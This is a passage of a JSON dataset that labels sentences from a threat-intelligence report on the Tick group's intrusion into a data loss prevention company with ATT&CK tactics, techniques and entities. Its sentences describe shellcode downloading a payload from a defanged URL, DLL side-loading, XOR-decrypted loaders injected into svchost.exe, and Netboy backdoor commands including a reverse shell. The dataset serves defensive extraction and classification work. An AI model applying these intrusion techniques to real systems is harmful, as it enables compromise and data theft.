"relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": null, "procedure": "The application code is patched and the malicious code is executed after the legitimate execution completes.", "entities": [ { "text": "is patched", "start": 40, "end": 50, "label": "Action" }, { "text": "is only executed", "start": 192, "end": 208, "label": "Action" } ] }, { "uid": "aptnotes-06_aptnotes_report-p4-s46-3651d2", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 4, "sentence_id": 46, "context_before": "The entry point code of the application is patched with a JMP instruction that points to the shellcode, and is located right after the call to WinMain (Figure 4); therefore the malicious code is only executed after the application’s legitimate code finishes its execution.", "sentence_text": "shellcode at the end of the PE’s section headers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p4-s47-0568e5", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 4, "sentence_id": 47, "context_before": "shellcode at the end of the PE’s section headers.", "sentence_text": "The shellcode, shown in Figure 5, downloads an unencrypted payload from http://softsrobot[.]com/index.html to %TEMP%\\ChromeUp.exe by default; if the file cannot be created, it gets a new name using the GetTempFileNameA API.\n4/11", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Shellcode downloads an unencrypted payload from a remote URL and saves it to %TEMP%\\ChromeUp.exe, renaming it if creation fails.", "entities": [ { "text": "The shellcode", "start": 0, "end": 13, "label": "MalwareTool" }, { "text": "downloads an unencrypted payload from http://softsrobot[.]com/index.html to %TEMP%\\ChromeUp.exe by default", "start": 34, "end": 140, "label": "Action" }, { "text": "http://softsrobot[.]com/index.html", "start": 72, "end": 106, "label": "Infrastructure_Indicator" }, { "text": "%TEMP%\\ChromeUp.exe", "start": 110, "end": 129, "label": "Infrastructure_Indicator" }, { "text": "it gets a new name using the GetTempFileNameA API", "start": 173, "end": 222, "label": "Action" } ] }, { "uid": "aptnotes-06_aptnotes_report-p5-s49-315cd2", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 5, "sentence_id": 49, "context_before": "64-bit installer", "sentence_text": "While only one malicious 32-bit installer was found, the 64-bit installers were detected in several places throughout the DLP company’s network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p5-s50-b4e759", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 5, "sentence_id": 50, "context_before": "While only one malicious 32-bit installer was found, the 64-bit installers were detected in several places throughout the DLP company’s network.", "sentence_text": "The installer contains the Q-Dir application and an encoded (VBE) ReVBShell backdoor that was customized by the attackers; both of them were compressed with LZO and encrypted with RC6.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p5-s51-90d54f", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 5, "sentence_id": 51, "context_before": "The installer contains the Q-Dir application and an encoded (VBE) ReVBShell backdoor that was customized by the attackers; both of them were compressed with LZO and encrypted with RC6.", "sentence_text": "The files are dropped in the %TEMP% directory and executed.\nReVBShell\nReVBShell is an open-source backdoor with very basic capabilities.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.005", "name": "Command and Scripting Interpreter: Visual Basic" } ], "procedure": "Drop files into the %TEMP% directory and execute them.", "entities": [ { "text": "The files", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "are dropped in the %TEMP% directory and executed", "start": 10, "end": 58, "label": "Action" }, { "text": "%TEMP% directory", "start": 29, "end": 45, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-06_aptnotes_report-p5-s52-c3eb78", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 5, "sentence_id": 52, "context_before": "The files are dropped in the %TEMP% directory and executed.\nReVBShell\nReVBShell is an open-source backdoor with very basic capabilities.", "sentence_text": "The backdoor code is written in VBScript and the controller code is written in Python.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p5-s53-41e008", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 5, "sentence_id": 53, "context_before": "The backdoor code is written in VBScript and the controller code is written in Python.", "sentence_text": "Communication with the server is over HTTP with GET and POST requests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p5-s54-b83cdc", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 5, "sentence_id": 54, "context_before": "Communication with the server is over HTTP with GET and POST requests.", "sentence_text": "More about the DLP company compromise In this section, we provide more details about tools and malware families that Tick deployed in the compromised software company’s network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p5-s55-fa728d", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 5, "sentence_id": 55, "context_before": "More about the DLP company compromise In this section, we provide more details about tools and malware families that Tick deployed in the compromised software company’s network.", "sentence_text": "To maintain persistent access, the attackers deployed malicious loader DLLs along with legitimate signed applications vulnerable to DLL search-order hijacking.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "Deploy malicious loader DLLs alongside legitimate signed applications to achieve persistence via DLL side-loading.", "entities": [ { "text": "the attackers", "start": 31, "end": 44, "label": "ThreatActor" }, { "text": "deployed malicious loader DLLs along with legitimate signed applications vulnerable to DLL search-order hijacking", "start": 45, "end": 158, "label": "Action" } ] }, { "uid": "aptnotes-06_aptnotes_report-p5-s56-dd6781", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 5, "sentence_id": 56, "context_before": "To maintain persistent access, the attackers deployed malicious loader DLLs along with legitimate signed applications vulnerable to DLL search-order hijacking.", "sentence_text": "The purpose of these DLLs is to decode and inject a payload into a designated process (in all cases of this incident, all loaders were configured to inject into svchost.exe).", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": [ { "name": "Process Injection", "id": "T1055" } ], "procedure": "The DLL decodes a payload and injects it into a designated process such as svchost.exe.", "entities": [ { "text": "decode", "start": 32, "end": 38, "label": "Action" }, { "text": "inject a payload into a designated process", "start": 43, "end": 85, "label": "Action" }, { "text": "svchost.exe", "start": 161, "end": 172, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-06_aptnotes_report-p6-s57-9bd7cb", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 6, "sentence_id": 57, "context_before": "The purpose of these DLLs is to decode and inject a payload into a designated process (in all cases of this incident, all loaders were configured to inject into svchost.exe).", "sentence_text": "In this report we will focus on analyzing the ShadowPy downloader and Netboy backdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p6-s58-2cbe50", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 6, "sentence_id": 58, "context_before": "In this report we will focus on analyzing the ShadowPy downloader and Netboy backdoor.", "sentence_text": "ShadowPy\nShadowPy is a downloader developed in Python and converted into a Windows executable using a customized version of py2exe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p6-s59-997cda", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 6, "sentence_id": 59, "context_before": "ShadowPy\nShadowPy is a downloader developed in Python and converted into a Windows executable using a customized version of py2exe.", "sentence_text": "The downloader contacts its C&C to obtain Python scripts to execute.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1059.006", "name": "Command and Scripting Interpreter: Python" } ], "procedure": "Downloader communicates with its C2 server to retrieve Python scripts and execute them.", "entities": [ { "text": "The downloader", "start": 0, "end": 14, "label": "MalwareTool" }, { "text": "contacts its C&C to obtain Python scripts to execute", "start": 15, "end": 67, "label": "Action" }, { "text": "C&C", "start": 28, "end": 31, "label": "Infrastructure_Indicator" }, { "text": "Python scripts", "start": 42, "end": 56, "label": "MalwareTool" } ] }, { "uid": "aptnotes-06_aptnotes_report-p6-s60-45981c", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 6, "sentence_id": 60, "context_before": "The downloader contacts its C&C to obtain Python scripts to execute.", "sentence_text": "Based on our findings, we believe the malware was developed at least two years before the compromise of the DLP company in 2021.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p6-s61-a987bc", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 6, "sentence_id": 61, "context_before": "Based on our findings, we believe the malware was developed at least two years before the compromise of the DLP company in 2021.", "sentence_text": "We have not observed any other incidents where ShadowPy was deployed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p6-s62-a52554", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 6, "sentence_id": 62, "context_before": "We have not observed any other incidents where ShadowPy was deployed.", "sentence_text": "Custom py2exe loader As previously described, the malicious DLL loader is launched via DLL side-loading; in the case of ShadowPy we observed vssapi.dll being side-loaded by avshadow.exe, a legitimate software component from the Avira security software suite.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "Execute a malicious DLL via DLL side-loading using a legitimate application.", "entities": [ { "text": "is launched via DLL side-loading", "start": 71, "end": 103, "label": "Action" }, { "text": "vssapi.dll", "start": 141, "end": 151, "label": "MalwareTool" }, { "text": "avshadow.exe", "start": 173, "end": 185, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-06_aptnotes_report-p6-s63-05f231", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 6, "sentence_id": 63, "context_before": "Custom py2exe loader As previously described, the malicious DLL loader is launched via DLL side-loading; in the case of ShadowPy we observed vssapi.dll being side-loaded by avshadow.exe, a legitimate software component from the Avira security software suite.", "sentence_text": "First, the DLL loader code locates the custom", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p6-s64-4e371e", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 6, "sentence_id": 64, "context_before": "First, the DLL loader code locates the custom", "sentence_text": "py2exe loader in its overlay and decrypts it using a NULL-preserving XOR using 0x56 as the key, then it loads it in memory and injects it in a new svchost.exe process that it creates.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Decrypt the embedded py2exe loader using XOR, load it into memory, and inject it into a newly created svchost.exe process.", "entities": [ { "text": "py2exe loader", "start": 0, "end": 13, "label": "MalwareTool" }, { "text": "decrypts it using a NULL-preserving XOR using 0x56 as the key", "start": 33, "end": 94, "label": "Action" }, { "text": "loads it in memory", "start": 104, "end": 122, "label": "Action" }, { "text": "injects it in a new svchost.exe process that it creates", "start": 127, "end": 182, "label": "Action" }, { "text": "svchost.exe", "start": 147, "end": 158, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-06_aptnotes_report-p6-s65-152cb5", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 6, "sentence_id": 65, "context_before": "py2exe loader in its overlay and decrypts it using a NULL-preserving XOR using 0x56 as the key, then it loads it in memory and injects it in a new svchost.exe process that it creates.", "sentence_text": "Then the entry point of the custom py2exe loader is executed on the remote process.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Execute the entry point of the custom py2exe loader within a remote process.", "entities": [ { "text": "the custom py2exe loader", "start": 24, "end": 48, "label": "MalwareTool" }, { "text": "the entry point of the custom py2exe loader is executed on the remote process", "start": 5, "end": 82, "label": "Action" }, { "text": "the remote process", "start": 64, "end": 82, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-06_aptnotes_report-p6-s66-e0b10d", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 6, "sentence_id": 66, "context_before": "Then the entry point of the custom py2exe loader is executed on the remote process.", "sentence_text": "The difference between the original py2exe loader code and the customized version used by Tick, is that the custom loader reads the contents of the malicious vssapi.dll from disk and searches for the Python engine and the PYC code in the overlay, whereas the original locates the engine and the PYC code in the resource section.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p7-s67-ebfeca", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 7, "sentence_id": 67, "context_before": "The difference between the original py2exe loader code and the customized version used by Tick, is that the custom loader reads the contents of the malicious vssapi.dll from disk and searches for the Python engine and the PYC code in the overlay, whereas the original locates the engine and the PYC code in the resource section.", "sentence_text": "Python downloader The PYC code is a simple downloader whose purpose is to retrieve a Python script and execute it in a new thread.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p7-s68-bc398c", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 7, "sentence_id": 68, "context_before": "Python downloader\nThe PYC code is a simple downloader whose purpose is to retrieve a Python script and execute it in a new thread.", "sentence_text": "This downloader randomly picks a URL from a list (although for the samples we analyzed only one URL was present) and builds a unique ID for the compromised machine by building a string composed of the following data:\nMachine local IP address MAC address Username (as returned by the %username% environment variable)\nDomain and username (results of the whoami command)\nNetwork computer name (as returned by Python’s platform.node function)\nOperating system information (as returned by Python’s platform.platform function)\nArchitecture information (as returned by Python’s platform.architecture function)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p7-s69-43ca47", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 7, "sentence_id": 69, "context_before": "This downloader randomly picks a URL from a list (although for the samples we analyzed only one URL was present) and builds a unique ID for the compromised machine by building a string composed of the following data:\nMachine local IP address MAC address Username (as returned by the %username% environment variable)\nDomain and username (results of the whoami command)\nNetwork computer name (as returned by Python’s platform.node function)\nOperating system information (as returned by Python’s platform.platform function)\nArchitecture information (as returned by Python’s platform.architecture function)", "sentence_text": "Finally, it uses abs(zlib.crc32()) to generate the value that will serve as an ID.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p7-s70-2dca2f", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 7, "sentence_id": 70, "context_before": "Finally, it uses abs(zlib.crc32()) to generate the value that will serve as an ID.", "sentence_text": "The ID is inserted in the middle of a string composed of random characters and is further obfuscated, then it is appended to the URL as shown in Figure 8.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p7-s71-bca4e1", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 7, "sentence_id": 71, "context_before": "The ID is inserted in the middle of a string composed of random characters and is further obfuscated, then it is appended to the URL as shown in Figure 8.", "sentence_text": "Lastly it is decompressed using zlib and executed in a new thread.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Decompress the payload using zlib and execute it within a new thread.", "entities": [ { "text": "decompressed using zlib", "start": 13, "end": 36, "label": "Action" }, { "text": "executed in a new thread", "start": 41, "end": 65, "label": "Action" }, { "text": "zlib", "start": 32, "end": 36, "label": "MalwareTool" }, { "text": "a new thread", "start": 53, "end": 65, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-06_aptnotes_report-p7-s72-43ff6e", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 7, "sentence_id": 72, "context_before": "Lastly it is decompressed using zlib and executed in a new thread.", "sentence_text": "Netboy\nNetboy (aka Invader) is a backdoor programmed in Delphi; it supports 34 commands that allow the attackers to capture the screen, perform mouse and keyboard events on the compromised machine, manipulate files and services, and obtain system and network information, among other capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p7-s73-ebfc61", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 7, "sentence_id": 73, "context_before": "Netboy\nNetboy (aka Invader) is a backdoor programmed in Delphi; it supports 34 commands that allow the attackers to capture the screen, perform mouse and keyboard events on the compromised machine, manipulate files and services, and obtain system and network information, among other capabilities.", "sentence_text": "Network protocol\nNetboy communicates with its C&C server over TCP.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p8-s74-1cc6d4", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 8, "sentence_id": 74, "context_before": "Network protocol\nNetboy communicates with its C&C server over TCP.", "sentence_text": "Backdoor commands\nNetboy supports 34 commands; however, in Table 1 we describe only 25 of the most prominent ones giving the attackers certain capabilities on the compromised systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p8-s75-90d70b", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 8, "sentence_id": 75, "context_before": "Backdoor commands\nNetboy supports 34 commands; however, in Table 1 we describe only 25 of the most prominent ones giving the attackers certain capabilities on the compromised systems.", "sentence_text": "Command ID Description 0x05 Create new TCP socket and store received data from its controller to a new file.\n8/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s76-5f35f3", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 76, "context_before": "Command ID Description 0x05 Create new TCP socket and store received data from its controller to a new file.\n8/11", "sentence_text": "Command ID Description 0x06 Create new TCP socket and read file; send contents to the controller.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s77-9dbab9", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 77, "context_before": "Command ID Description 0x06 Create new TCP socket and read file; send contents to the controller.", "sentence_text": "0x0A List network resources that are servers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s79-db7432", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 79, "context_before": "0x0B", "sentence_text": "List files in a given directory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s82-f41768", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 82, "context_before": "List drives.", "sentence_text": "0x0E Execute program with ShellExecute Windows API.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s86-0d332e", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 86, "context_before": "0x10 List processes.", "sentence_text": "0x11 Enumerate modules in a process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s87-1a0220", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 87, "context_before": "0x11 Enumerate modules in a process.", "sentence_text": "0x12 Terminate process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s88-3a6520", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 88, "context_before": "0x12 Terminate process.", "sentence_text": "0x13 Execute program and get output.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s89-06c2e2", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 89, "context_before": "0x13 Execute program and get output.", "sentence_text": "0x16 Download a new file from the server and execute with ShellExecute Windows API.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s90-5fd061", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 90, "context_before": "0x16 Download a new file from the server and execute with ShellExecute Windows API.", "sentence_text": "0x1D Create reverse shell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s91-e1cf18", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 91, "context_before": "0x1D Create reverse shell.", "sentence_text": "0x1E Terminate shell process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s93-2de675", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 93, "context_before": "0x1F", "sentence_text": "Get TCP and UDP connections information using the WinSNMP API.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s94-062d92", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 94, "context_before": "Get TCP and UDP connections information using the WinSNMP API.", "sentence_text": "0x23 List services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s95-7cc7f2", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 95, "context_before": "0x23 List services.", "sentence_text": "0x24 Start service specified by the controller.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s96-85ea26", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 96, "context_before": "0x24 Start service specified by the controller.", "sentence_text": "0x25 Stop service specified by the controller.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s97-2a5797", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 97, "context_before": "0x25 Stop service specified by the controller.", "sentence_text": "0x26 Create a new service.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s98-aabd70", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 98, "context_before": "0x26 Create a new service.", "sentence_text": "0x27 Delete service specified by the controller.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s99-cb49fc", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 99, "context_before": "0x27 Delete service specified by the controller.", "sentence_text": "0x28 Set TCP connection state.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s100-d8b134", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 100, "context_before": "0x28 Set TCP connection state.", "sentence_text": "0x29 Start screen capture and send to the controller every 10 milliseconds.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s102-bd9032", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 102, "context_before": "0x2A", "sentence_text": "Stop screen capture.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s104-e9a23a", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 104, "context_before": "0x2B", "sentence_text": "Perform mouse and keyboard events requested by the controller.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s105-6d4b4d", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 105, "context_before": "Perform mouse and keyboard events requested by the controller.", "sentence_text": "Possibly related activity In May 2022, AhnLab researchers published a report about an unidentified threat actor targeting entities and individuals from South Korea with CHM files that deploy a legitimate executable and a malicious DLL for side-loading.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s106-c6de5c", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 106, "context_before": "Possibly related activity In May 2022, AhnLab researchers published a report about an unidentified threat actor targeting entities and individuals from South Korea with CHM files that deploy a legitimate executable and a malicious DLL for side-loading.", "sentence_text": "The decoded script reveals a ReVBShell backdoor once again.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p9-s107-27cb6c", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 9, "sentence_id": 107, "context_before": "The decoded script reveals a ReVBShell backdoor once again.", "sentence_text": "We believe that campaign is likely to be related to the attack described in this report, as the custom ReVBShell backdoor of both attacks is the same, and there are multiple code similarities between the malicious 64-bit installer (SHA-1:\nB9675D0EFBC4AE92E02B3BFC8CA04B01F8877DB6) and the quartz.dll sample (SHA-1:\nECC352A7AB3F97B942A6BDC4877D9AFCE19DFE55) described by AhnLab.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s109-03f48d", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 109, "context_before": "Conclusion\n9/11", "sentence_text": "ESET researchers uncovered a compromise of an East Asian data loss prevention company.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s110-28dcdd", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 110, "context_before": "ESET researchers uncovered a compromise of an East Asian data loss prevention company.", "sentence_text": "During the intrusion, the attackers deployed at least three malware families, and compromised update servers and tools used by the compromised company.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Attackers deployed multiple malware families and compromised update servers and tools within the victim company.", "entities": [ { "text": "the attackers", "start": 22, "end": 35, "label": "ThreatActor" }, { "text": "deployed at least three malware families", "start": 36, "end": 76, "label": "Action" }, { "text": "three malware families", "start": 54, "end": 76, "label": "MalwareTool" }, { "text": "compromised update servers and tools used by the compromised company", "start": 82, "end": 150, "label": "Action" }, { "text": "update servers and tools used by the compromised company", "start": 94, "end": 150, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-06_aptnotes_report-p10-s111-785714", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 111, "context_before": "During the intrusion, the attackers deployed at least three malware families, and compromised update servers and tools used by the compromised company.", "sentence_text": "As a result, two customers of the company were subsequently compromised.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s112-5040ab", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 112, "context_before": "As a result, two customers of the company were subsequently compromised.", "sentence_text": "Our analysis of the malicious tools used during the attack revealed previously undocumented malware, which we named ShadowPy.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s113-5c344f", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 113, "context_before": "Our analysis of the malicious tools used during the attack revealed previously undocumented malware, which we named ShadowPy.", "sentence_text": "We would like to thank Cha Minseok from AhnLab for sharing information and samples during our research.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s114-2f4dd4", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 114, "context_before": "We would like to thank Cha Minseok from AhnLab for sharing information and samples during our research.", "sentence_text": "ESET Research offers private APT intelligence reports and data feeds.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s115-7b52e6", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 115, "context_before": "ESET Research offers private APT intelligence reports and data feeds.", "sentence_text": "For any inquiries about this service, visit the ESET Threat Intelligence page.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s116-b8f053", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 116, "context_before": "For any inquiries about this service, visit the ESET Threat Intelligence page.", "sentence_text": "IoCs\nFiles\nSHA-1 Filename ESET detection name Description 72BDDEAD9B508597B75C1EE8BE970A7CA8EB85DC dwmapi.dll Win32/Netboy.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s118-993ab1", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 118, "context_before": "A Netboy backdoor.", "sentence_text": "8BC1F41A4DDF5CFF599570ED6645B706881BEEED vssapi.dll 